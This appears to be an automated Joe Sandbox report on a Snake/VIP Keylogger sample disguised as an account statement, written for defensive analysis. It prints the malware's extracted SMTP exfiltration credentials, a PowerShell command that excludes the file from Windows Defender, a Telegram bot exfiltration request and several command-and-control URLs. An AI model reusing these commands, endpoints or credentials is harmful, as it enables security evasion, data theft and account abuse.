Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Overview

General Information

Sample name:[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Analysis ID:1620673
MD5:8dffb651c06ea1e66e1a006c4e22d916
SHA1:1f4847423be89cb1929a6ae13ae22c17b8a65c6f
SHA256:9c97162ae48aca365e6dc2e733af007bef8b6aaec168dac76216abe4b414ae15
Tags:exeuser-MAM
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe (PID: 4676 cmdline: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe" MD5: 8DFFB651C06EA1E66E1A006C4E22D916)
    • powershell.exe (PID: 5596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.4612177769.0000000003C10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d6aa:$a1: get_encryptedPassword
          • 0x2d9c3:$a2: get_encryptedUsername
          • 0x2d4c8:$a3: get_timePasswordChanged
          • 0x2d5c3:$a4: get_passwordField
          • 0x2d6c0:$a5: set_encryptedPassword
          • 0x2ed60:$a7: get_logins
          • 0x2ecc3:$a10: KeyLoggerEventArgs
          • 0x2e92a:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2baaa:$a1: get_encryptedPassword
                • 0x2bdc3:$a2: get_encryptedUsername
                • 0x2b8c8:$a3: get_timePasswordChanged
                • 0x2b9c3:$a4: get_passwordField
                • 0x2bac0:$a5: set_encryptedPassword
                • 0x2d160:$a7: get_logins
                • 0x2d0c3:$a10: KeyLoggerEventArgs
                • 0x2cd2a:$a11: KeyLoggerEventArgsEventHandler
                0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39894:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38f37:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39194:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39b73:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 25 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ParentImage: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ParentProcessId: 4676, ParentProcessName: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ProcessId: 5596, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ParentImage: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ParentProcessId: 4676, ParentProcessName: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ProcessId: 5596, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ParentImage: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ParentProcessId: 4676, ParentProcessName: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ProcessId: 5596, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-21T07:12:25.536268+010028033053Unknown Traffic192.168.2.549729104.21.96.1443TCP
                2025-02-21T07:12:26.784067+010028033053Unknown Traffic192.168.2.549733104.21.96.1443TCP
                2025-02-21T07:12:28.041444+010028033053Unknown Traffic192.168.2.549743104.21.96.1443TCP
                2025-02-21T07:12:29.300294+010028033053Unknown Traffic192.168.2.549754104.21.96.1443TCP
                2025-02-21T07:12:30.553194+010028033053Unknown Traffic192.168.2.549763104.21.96.1443TCP
                2025-02-21T07:12:33.937013+010028033053Unknown Traffic192.168.2.549782104.21.96.1443TCP
                2025-02-21T07:12:35.209375+010028033053Unknown Traffic192.168.2.549795104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-21T07:12:24.019115+010028032742Potentially Bad Traffic192.168.2.549724193.122.6.16880TCP
                2025-02-21T07:12:24.987880+010028032742Potentially Bad Traffic192.168.2.549724193.122.6.16880TCP
                2025-02-21T07:12:26.225854+010028032742Potentially Bad Traffic192.168.2.549730193.122.6.16880TCP
                2025-02-21T07:12:27.503504+010028032742Potentially Bad Traffic192.168.2.549737193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-21T07:12:36.114549+010018100071Potentially Bad Traffic192.168.2.549801149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587"}
                Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587", "Version": "4.4"}
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeVirustotal: Detection: 22%Perma Link
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeReversingLabs: Detection: 18%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: infocff@fairpsb.com
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: x]7gRoyV8T]y
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: mail.fairpsb.com
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: indexforwarder@gmail.com
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: 587
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor:
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: infocff@fairpsb.com
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: x]7gRoyV8T]y
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: mail.fairpsb.com
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: indexforwarder@gmail.com
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor: 587
                Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49726 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 192.168.2.5:49782 -> 104.21.96.1:443 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49801 version: TLS 1.2
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Gcz.pdb source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: Binary string: Gcz.pdbSHA256KA source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 4x nop then jmp 00007FF848CEBE00h5_2_00007FF848CEBA93
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 4x nop then jmp 00007FF848CE95B4h5_2_00007FF848CE93A2
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 4x nop then jmp 00007FF848CEB80Dh5_2_00007FF848CEB47D
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 4x nop then jmp 00007FF848CE91F9h5_2_00007FF848CE874D
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 4x nop then jmp 00007FF848CEBE00h5_2_00007FF848CEBD1C
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 4x nop then jmp 00007FF848CEA060h5_2_00007FF848CE972F

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49801 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2021/02/2025%20/%2013:36:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49737 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49730 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49733 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49729 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49795 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49782 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49763 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49726 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 192.168.2.5:49782 -> 104.21.96.1:443 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2021/02/2025%20/%2013:36:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 21 Feb 2025 06:12:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2209480776.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003BE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
